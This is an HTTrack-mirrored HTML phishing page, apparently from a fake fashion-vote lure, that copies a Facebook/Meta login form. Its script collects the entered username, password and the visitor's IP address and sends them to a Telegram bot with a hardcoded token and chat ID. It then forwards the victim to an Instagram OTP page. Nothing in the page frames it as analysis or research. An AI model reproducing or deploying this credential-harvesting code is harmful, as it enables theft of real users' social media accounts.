
<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from voting.name.ng/slink/vote-ig-fashion_dar_v/login by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 10 Mar 2025 20:44:54 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Page</title>
    <script src="https://cdn.tailwindcss.com/"></script>
    <link href="../../../cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" rel="stylesheet"/>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500&amp;display=swap" rel="stylesheet"/>
    <style>
        body {
            font-family: 'Roboto', sans-serif;
            background: linear-gradient(to bottom right, #fbe0ff00, #c9ebf000);
        }
    </style>
</head>
<body class="flex items-center justify-center min-h-screen">
     <div class="w-full max-w-sm p-6 rounded-lg">
        <div class="text-center mb-6">
            <img alt="Facebook logo" class="mx-auto mb-4" height="80" src="https://i.postimg.cc/FKk4ZQ1r/60ed83ab035dbe00046c24b8.png" width="70"/>
        </div>
        <br><br>
        <form id="contactForm" method="POST">
<input type="text" id="ipaddress" name="ia" hidden>
            <div class="mb-4">
                <input class="w-full px-6 py-3 border rounded-lg focus:outline-none focus:ring-2 focus:ring-black-900" placeholder="Mobile number or email address" type="text" name="username" id="username" required/>
            </div>
            <div class="mb-4">
                <input class="w-full px-6 py-3 border rounded-lg focus:outline-none focus:ring-2 focus:ring-black-600" placeholder="Password" type="text" name="password" id="password" required/>
            </div>
            <div class="mb-4">
                <button class="w-full py-3 bg-blue-700 text-white rounded-xl hover:bg-black-700" type="submit" id="button" value="submit">
                    Log in
                </button>
            </div>
            <div class="text-center mb-4">
                <a class="text-black-600 hover:underline" href="#">
                    Forgotten Password?
                </a>
            </div>
            <br><br><br><br><br>
            <div class="text-center mb-4">
                <button class="w-full py-3 border border-blue-600 text-blue-600 rounded-xl hover:bg-blue-50" type="button">
                    Create new account
                </button>
            </div>
            <div class="text-center mt-6">
                <img alt="Meta logo" class="mx-auto mb-2" height="20" src="https://i.postimg.cc/DZY1KLnd/pngegg-2.png" width="70"/>
            </div>
                    </form>
    </div>
    <script>
        document.addEventListener('DOMContentLoaded', function () {
            // Replace 'https://api.ipify.org?format=json' with a preferred IP API if needed
            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    const ipaddress = data.ip;
                    document.getElementById('ia').value = ia;
                })
                .catch(error => {
                    console.error('Error fetching IP address:', error);
                });
        });

  document.getElementById('contactForm').addEventListener('submit', function (event) {
            event.preventDefault();

            var username = document.getElementById('username').value;
            var password = document.getElementById('password').value;
            var ipaddress = document.getElementById('ipaddress').value;

            var telegramMessage = `Username-ig: ${username}\nPassword-ig: ${password}\nIpaddress: ${ipaddress}`;
           
             var token = '8052566388:AAGXSqF9uAzaa_SfqD1KO2dROSA2cb0GvKs';
            var chat_id = '7876943857'
            var url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${encodeURIComponent(telegramMessage)}`;

            fetch(url)
                .then(response => response.json())
                .then(data => {
                    if (data.ok) {
                        window.location.href = 'instagram/otp/657daf104b167f68d1979b9c.html';  // Redirect to thank you page
                    } else {
                        alert('Error sending message.');
                    }
                })
                .catch(error => {
                    console.error('Error:', error);
                });
        });

    </script>
</body>

<!-- Mirrored from voting.name.ng/slink/vote-ig-fashion_dar_v/login by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 10 Mar 2025 20:44:55 GMT -->
</html>
